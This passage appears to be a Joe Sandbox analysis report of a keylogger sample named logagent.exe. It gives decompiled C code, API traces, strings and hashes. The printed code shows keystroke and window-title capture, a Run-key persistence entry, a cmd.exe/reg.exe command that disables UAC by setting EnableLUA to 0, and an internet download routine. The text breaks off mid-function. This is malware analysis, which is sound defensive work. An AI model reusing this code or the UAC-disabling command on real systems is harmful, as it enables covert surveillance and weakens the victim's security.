                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D8D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405DA1
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00405DC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                  • String ID: Offline Keylogger Stopped$[INFO]
                                  • API String ID: 2222684746-1731565019
                                  • Opcode ID: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                  • Instruction ID: e64c4fb295ac971b427419d3758f0b97408fd66a05d8179c7aec1af0dcca75a5
                                  • Opcode Fuzzy Hash: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                  • Instruction Fuzzy Hash: 0C01D674910B046BE7107725C84D7FB7EBCDF81750F44846BE842922C1D7B869458FAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E0040B7B9(void* _a4, void* _a8, short* _a12, void* _a16, int _a32) {
                                  				long _t15;
                                  				long _t18;
                                  				void* _t21;
                                  				int _t22;
                                  				void* _t28;
                                  
                                  				_t15 = RegCreateKeyW(_a4, _a8,  &_a8);
                                  				if(_t15 != 0) {
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					return 0;
                                  				} else {
                                  					__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ(_t28, _t21);
                                  					_t17 = _t15 + _t15 + 2;
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t22 = 0;
                                  					_t18 = RegSetValueExW(_a8, _a12, 0, _a32, _t15 + _t15 + 2, _t17);
                                  					RegCloseKey(_a8);
                                  					if(_t18 == 0) {
                                  						_t22 = 1;
                                  					}
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					return _t22;
                                  				}
                                  			}

                                  APIs
                                  • RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28), ref: 0040B7D5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28), ref: 0040B7E3
                                  • RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                  • RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28), ref: 0040B801
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 0040B810
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 0040B81F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                  • String ID:
                                  • API String ID: 1037601705-0
                                  • Opcode ID: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                  • Instruction ID: 16de392092bcd2de4e66c717f3c3c884efc51066479430e04c8b01777f2a524b
                                  • Opcode Fuzzy Hash: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                  • Instruction Fuzzy Hash: 4501A87204050DEFCF00AFA0EC998EA7B6DFB583597458035FD1996161D7329E14DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E0040A0E1() {
                                  				struct _PROCESS_INFORMATION _v20;
                                  				struct _STARTUPINFOA _v88;
                                  				signed int _t17;
                                  
                                  				_t17 = 0x11;
                                  				memset( &_v88, 0, _t17 << 2);
                                  				_v88.cb = 0x44;
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                  				CloseHandle(_v20);
                                  				return CloseHandle(_v20.hThread);
                                  			}

                                  APIs
                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,0041BA38,0041BCB0), ref: 0040A11F
                                  • CloseHandle.KERNEL32(?), ref: 0040A12E
                                  • CloseHandle.KERNEL32(?), ref: 0040A133
                                  Strings
                                  • D, xrefs: 0040A0F6
                                  • C:\Windows\System32\cmd.exe, xrefs: 0040A11A
                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040A115
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreateProcess
                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                  • API String ID: 2922976086-1747066916
                                  • Opcode ID: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                  • Instruction ID: 0928101be9c5a4b5cd6cbd2924aec545eff454ae04b53be068f3b7a54285d6aa
                                  • Opcode Fuzzy Hash: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                  • Instruction Fuzzy Hash: 5EF054B2A00518BEFB019BE8DC05EFFBB7DE784700F114436FA11F6060D6746D088AA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 2478582372-0
                                  • Opcode ID: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                  • Instruction ID: 9f96166dac4781290f3bd34c47d79f1531a5159583b3a655759a1da2a24b60ea
                                  • Opcode Fuzzy Hash: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                  • Instruction Fuzzy Hash: 50F0F97590060EEBCF04EFA0DD5D9EE7B78AF84349B008024F90697290DA70AA09CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                  • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                  • String ID:
                                  • API String ID: 914748455-0
                                  • Opcode ID: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                  • Instruction ID: f669f26280469c21e485b93068b71aa9fa6b13bd9f3a6efc1e343f131735dcea
                                  • Opcode Fuzzy Hash: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                  • Instruction Fuzzy Hash: 08F0A97690450EEBCB04EFA0ED5DDEE7B78EB84305B048065F906972A0DA74AA09CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 1054C817
                                    • Part of subcall function 10553E4D: time.MSVCRT ref: 10553E74
                                    • Part of subcall function 10553E4D: srand.MSVCRT ref: 10553E81
                                  • Sleep.KERNEL32(00000064), ref: 1054C96C
                                    • Part of subcall function 1055476E: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,105435A8,00000000), ref: 10554788
                                  • Sleep.KERNEL32(000001F4), ref: 1054CBB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileSleep$CreateModuleNamesrandtime
                                  • String ID: /stext "$(VA
                                  • API String ID: 2367270535-1999781807
                                  • Opcode ID: d59d310995aa2f70bac365abca90406b2b7745100f9f3f901980419f6c0f6b76
                                  • Instruction ID: c881891a41934dad47a0f8c8ea268d1f2e8149e05080569a066b4cd6cfa5f662
                                  • Opcode Fuzzy Hash: d59d310995aa2f70bac365abca90406b2b7745100f9f3f901980419f6c0f6b76
                                  • Instruction Fuzzy Hash: 2502FD72C0050EEBDB04EBE0EC59EDEBB7CEF94245F048166F516E3050EA756649CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 34%
                                  			E105442ED(void* __eflags, intOrPtr _a4, char _a7) {
                                  				char _v5;
                                  				void* _v12;
                                  				char _v28;
                                  				void* _v44;
                                  				char _v60;
                                  				char _v76;
                                  				char _v92;
                                  				struct tagMSG _v120;
                                  				intOrPtr* _t31;
                                  				intOrPtr _t49;
                                  				void* _t54;
                                  				void* _t62;
                                  				void* _t76;
                                  				void* _t77;
                                  				intOrPtr _t109;
                                  				void* _t111;
                                  				void* _t115;
                                  				void* _t118;
                                  				void* _t119;
                                  				void* _t121;
                                  
                                  				_t121 = __eflags;
                                  				_t109 = _a4;
                                  				 *0x41533c(_t109 + 0x18);
                                  				SetEvent( *(_t109 + 0x28));
                                  				_t31 =  *0x415344();
                                  				 *0x415304();
                                  				 *0x41533c();
                                  				 *0x41533c();
                                  				E1055437A(_t121,  &_v28,  &_v76, 0x41b310,  &_v76, 4,  *((intOrPtr*)( *0x4152fc)));
                                  				_t118 = _t115 + 0x24;
                                  				_t111 =  *_t31 - 0x3a;
                                  				if(_t111 == 0) {
                                  					E1054319B( &_v28, __eflags, 0);
                                  					_t76 = E10548768( *0x415344());
                                  					__eflags = _t76;
                                  					if(_t76 == 0) {
                                  						L12:
                                  						E1054316C( &_v28);
                                  						 *0x415348();
                                  						 *0x415348();
                                  						__eflags = 0;
                                  						return 0;
                                  					}
                                  					 *0x41b794 = E105489C2(_t76, 0x41575c);
                                  					 *0x41b798 = E105489C2(_t76, 0x415750);
                                  					_t49 = E105489C2(_t76, 0x415744);
                                  					_t119 = _t118 + 8;
                                  					 *0x41b79c = _t49;
                                  					 *0x41b790 = 1;
                                  					 *0x41533c();
                                  					E10543A51(_t109, 0x74, 0x41b738);
                                  					L10:
                                  					_t77 = HeapCreate(0, 0, 0);
                                  					_t54 =  *0x41b798(_t77,  &_v12);
                                  					__eflags = _t54;
                                  					if(_t54 != 0) {
                                  						_t119 = _t119 - 0x10;
                                  						 *0x415330(_t54,  &_v5);
                                  						E10543A51(_t109, 0x3b, _v12);
                                  						HeapFree(_t77, 0, _v12);
                                  					}
                                  					goto L10;
                                  				}
                                  				_t123 = _t111 != 1;
                                  				if(_t111 != 1) {
                                  					goto L12;
                                  				}
                                  				E10554210();
                                  				_t62 =  *0x41b794( *0x41532c( &_v92, E1054319B( &_v28, _t123, 0)));
                                  				 *0x415350();
                                  				if(_t62 == 0) {
                                  					goto L12;
                                  				}
                                  				 *0x4152f4( &_a7);
                                  				E105541E4( &_v60, _t118 - 0x10,  &_v60);
                                  				E10543A51(_t109, 0x3b, 0x41576c);
                                  				 *0x415350();
                                  				L4:
                                  				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
                                  					if(__eflags >= 0) {
                                  						goto L12;
                                  					}
                                  				}
                                  				TranslateMessage( &_v120);
                                  				DispatchMessageA( &_v120);
                                  				goto L4;
                                  			}
                                  0x105442ed
                                  0x105442f6
                                  0x10544300
                                  0x10544309
                                  0x10544312
                                  0x1054432a
                                  0x1054433a
                                  0x10544349
                                  0x10544353
                                  0x10544358
                                  0x1054435b
                                  0x1054435e
                                  0x1054440f
                                  0x10544422
                                  0x10544425
                                  0x10544427
                                  0x105444c2
                                  0x105444c5
                                  0x105444cd
                                  0x105444d6
                                  0x105444de
                                  0x105444e2
                                  0x105444e2
                                  0x1054443e
                                  0x1054444e
                                  0x10544453
                                  0x10544458
                                  0x1054445b
                                  0x10544462
                                  0x1054446e
                                  0x10544478
                                  0x1054447d
                                  0x10544486
                                  0x1054448d
                                  0x10544494
                                  0x10544497
                                  0x10544499
                                  0x105444a6
                                  0x105444b0
                                  0x105444ba
                                  0x105444ba
                                  0x00000000
                                  0x10544497
                                  0x10544364
                                  0x10544365
                                  0x00000000
                                  0x00000000
                                  0x1054437b
                                  0x1054438b
                                  0x10544397
                                  0x1054439f
                                  0x00000000
                                  0x00000000
                                  0x105443b1
                                  0x105443c1
                                  0x105443cc
                                  0x105443d4
                                  0x00000000
                                  0x105443da
                                  0x10544401
                                  0x00000000
                                  0x00000000
                                  0x10544407
                                  0x105443ef
                                  0x105443f9
                                  0x00000000

                                  APIs
                                  • SetEvent.KERNEL32(?), ref: 10544309
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 105443E1
                                  • TranslateMessage.USER32(?), ref: 105443EF
                                  • DispatchMessageA.USER32(?), ref: 105443F9
                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 10544480
                                  • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 105444BA
                                    • Part of subcall function 10554210: ??2@YAPAXI@Z.MSVCRT ref: 1055422A
                                    • Part of subcall function 10554210: ??3@YAXPAX@Z.MSVCRT ref: 10554275
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Heap$??2@??3@CreateDispatchEventFreeTranslate
                                  • String ID:
                                  • API String ID: 3534166713-0
                                  • Opcode ID: 125cd5be9a9c0694a7d7584a9183133b2ec1a116ec69db6993fa9076d658da0d
                                  • Instruction ID: 6b7518d8b66daad7292da22b99f69edcdbbe8f0b701430f294a67c64aed83f97
                                  • Opcode Fuzzy Hash: 125cd5be9a9c0694a7d7584a9183133b2ec1a116ec69db6993fa9076d658da0d
                                  • Instruction Fuzzy Hash: 4F514E72A00609EBCB04ABF0EC8E9EE7F78EF84351B604425F516D31A0EF75A945CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 26%
                                  			E1054734D(intOrPtr __ecx) {
                                  				char _v5;
                                  				char _v6;
                                  				char _v7;
                                  				intOrPtr _v12;
                                  				signed int _v16;
                                  				char _v28;
                                  				char _v44;
                                  				char _v60;
                                  				char _v76;
                                  				void* _v92;
                                  				intOrPtr _t41;
                                  				int _t43;
                                  				signed int _t50;
                                  				void* _t57;
                                  				int _t64;
                                  				struct HWND__* _t109;
                                  				intOrPtr _t110;
                                  				void* _t115;
                                  
                                  				_v12 = __ecx;
                                  				while(1) {
                                  					_t41 = _v12;
                                  					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
                                  						break;
                                  					}
                                  					if(( *0x41b990 & 0x00000001) == 0) {
                                  						 *0x41b990 =  *0x41b990 | 0x00000001;
                                  						 *0x41534c( &_v5);
                                  						E10555801(0x405bb5);
                                  					}
                                  					Sleep(0x1f4);
                                  					_t109 = GetForegroundWindow();
                                  					_t43 = GetWindowTextLengthA(_t109);
                                  					_t111 = _t43;
                                  					_t9 = _t111 + 1; // 0x1
                                  					 *0x4151f4(_t9, 0,  &_v6);
                                  					if(_t43 != 0) {
                                  						_t64 =  *0x4152e4();
                                  						GetWindowTextA(_t109,  *0x415344(), _t64);
                                  						_push(0x41b998);
                                  						_push( &_v44);
                                  						if( *0x4151f0() == 0) {
                                  							 *0x415338( &_v44);
                                  							 *0x415340( *0x4152e4() - 1);
                                  							if( *0x41b93e == 0) {
                                  								_t119 = _t115 - 0x10;
                                  								L10555B05();
                                  								L10555AFF();
                                  								_t115 = _t115 - 0x10 + 0x18;
                                  								E10546E78(_v12, _t119,  &_v60,  &_v60, 0x415a4c,  &_v44);
                                  								 *0x415348(0x415a54, 0);
                                  							} else {
                                  								_t115 = _t115 - 0x10;
                                  								 *0x41533c( &_v44);
                                  								E10547762(_v12);
                                  							}
                                  						}
                                  					}
                                  					_t110 = _v12;
                                  					_t87 = _t110;
                                  					E105485C4(_t110);
                                  					if(E1055402A(_t110) < 0xea60) {
                                  						L16:
                                  						 *0x415348();
                                  						continue;
                                  					} else {
                                  						while( *((intOrPtr*)(_t110 + 0x3c)) != 0 ||  *((intOrPtr*)(_t110 + 0x3d)) != 0) {
                                  							_t50 = E1055402A(_t87);
                                  							if(_t50 < 0xea60) {
                                  								 *0x41541c(_v16 / 0xea60,  &_v28, 0xa);
                                  								_t117 = _t115 + 0xc - 0x10;
                                  								_t57 =  *0x415318( &_v28,  &_v7, 0x415a78, 0);
                                  								L10555B05();
                                  								L10555AFF();
                                  								_t115 = _t115 + 0xc - 0x10 + 0x18;
                                  								E10546E78(_t110, _t117,  &_v76,  &_v76, 0x415a5c, _t57);
                                  								 *0x415348();
                                  								 *0x415348();
                                  								goto L16;
                                  							}
                                  							_v16 = _t50;
                                  							Sleep(0x3e8);
                                  						}
                                  						 *0x415348();
                                  						break;
                                  					}
                                  				}
                                  				return 0;
                                  			}
                                  0x10547356
                                  0x1054735b
                                  0x1054735b
                                  0x10547361
                                  0x00000000
                                  0x00000000
                                  0x10547373
                                  0x10547375
                                  0x10547385
                                  0x10547390
                                  0x10547395
                                  0x1054739b
                                  0x105473a7
                                  0x105473aa
                                  0x105473b0
                                  0x105473b7
                                  0x105473be
                                  0x105473c6
                                  0x105473cf
                                  0x105473e1
                                  0x105473ea
                                  0x105473ef
                                  0x105473fa
                                  0x10547405
                                  0x10547419
                                  0x10547425
                                  0x10547444
                                  0x10547458
                                  0x10547462
                                  0x1054746a
                                  0x1054746d
                                  0x10547475
                                  0x10547427
                                  0x10547427
                                  0x10547430
                                  0x10547439
                                  0x10547439
                                  0x10547425
                                  0x105473fa
                                  0x1054747b
                                  0x1054747e
                                  0x10547480
                                  0x10547491
                                  0x10547526
                                  0x10547529
                                  0x00000000
                                  0x10547497
                                  0x10547497
                                  0x105474a5
                                  0x105474ac
                                  0x105474cc
                                  0x105474dc
                                  0x105474eb
                                  0x105474fb
                                  0x10547505
                                  0x1054750a
                                  0x1054750f
                                  0x10547517
                                  0x10547520
                                  0x00000000
                                  0x10547520
                                  0x105474b3
                                  0x105474b6
                                  0x105474b6
                                  0x10547537
                                  0x00000000
                                  0x10547537
                                  0x10547491
                                  0x10547543

                                  APIs
                                  • Sleep.KERNEL32(000001F4), ref: 1054739B
                                  • GetForegroundWindow.USER32 ref: 105473A1
                                  • GetWindowTextLengthA.USER32(00000000), ref: 105473AA
                                  • GetWindowTextA.USER32(00000000,00000000), ref: 105473E1
                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,00415A54,?,?,00000000), ref: 105474B6
                                  • _itoa.MSVCRT ref: 105474CC
                                    • Part of subcall function 10546E78: SetEvent.KERNEL32(?,?,1054866C,?,?,?,?,?,00415D88), ref: 10546EA7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$SleepText$EventForegroundLength_itoa
                                  • String ID:
                                  • API String ID: 4128525496-0
                                  • Opcode ID: acb9145f4f3c268f41fa4fd6706b6193e652c9364fdfcfa20cf4a7a3c30a3bd3
                                  • Instruction ID: 964a6adf01ead198c3133bdb31d656bd7e6b9559f6b65ad57fe940420a15d84e
                                  • Opcode Fuzzy Hash: acb9145f4f3c268f41fa4fd6706b6193e652c9364fdfcfa20cf4a7a3c30a3bd3
                                  • Instruction Fuzzy Hash: 9F517272D0064DEBCB00EBE0DC9D9EE7F78EF84251F144066E502E7190EB746989CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E10553EE2(void* __ecx, void* __eflags, char* _a4, void** _a8, long _a12, signed int _a15) {
                                  				void* _v8;
                                  				char* _v12;
                                  				void* _v16;
                                  				void _v10016;
                                  				void* _t35;
                                  				void* _t36;
                                  				void* _t42;
                                  				void* _t44;
                                  				void* _t46;
                                  				unsigned int* _t55;
                                  				signed int _t57;
                                  				signed int _t58;
                                  				signed int _t64;
                                  				signed int _t74;
                                  				char* _t98;
                                  				intOrPtr* _t99;
                                  				void* _t100;
                                  				void* _t101;
                                  				void* _t102;
                                  				void* _t103;
                                  
                                  				E1055585F(0x271c, __ecx);
                                  				_t55 = _a12;
                                  				_a15 = _a15 & 0x00000000;
                                  				_t98 = 0;
                                  				 *_a8 = 0;
                                  				 *_t55 = 0;
                                  				_t35 = InternetOpenA(0x416c68, 1, 0, 0, 0);
                                  				_v16 = _t35;
                                  				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
                                  				_v8 = _t36;
                                  				if(_t36 != 0) {
                                  					_a12 = 0;
                                  					_a4 = 0;
                                  					while(1) {
                                  						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710,  &_a12);
                                  						if(_t42 != 0 && _a12 <= _t98) {
                                  							break;
                                  						}
                                  						_t44 =  *_t55 + _a12;
                                  						_push(_t44);
                                  						L10555813();
                                  						_t57 =  *_t55;
                                  						_t100 = _a4;
                                  						_t58 = _t57 >> 2;
                                  						_v12 = memcpy(_t44, _t100, _t58 << 2);
                                  						_push(_a4);
                                  						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
                                  						_t101 =  &_v10016;
                                  						_t64 = _a12 >> 2;
                                  						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
                                  						_t103 = _t103 + 0x30;
                                  						L1055584D();
                                  						_a4 = _v12;
                                  						 *_t55 =  *_t55 + _a12;
                                  						_t98 = 0;
                                  					}
                                  					_push( *_t55);
                                  					L10555813();
                                  					_t102 = _a4;
                                  					 *_a8 = _t42;
                                  					_t74 =  *_t55 >> 2;
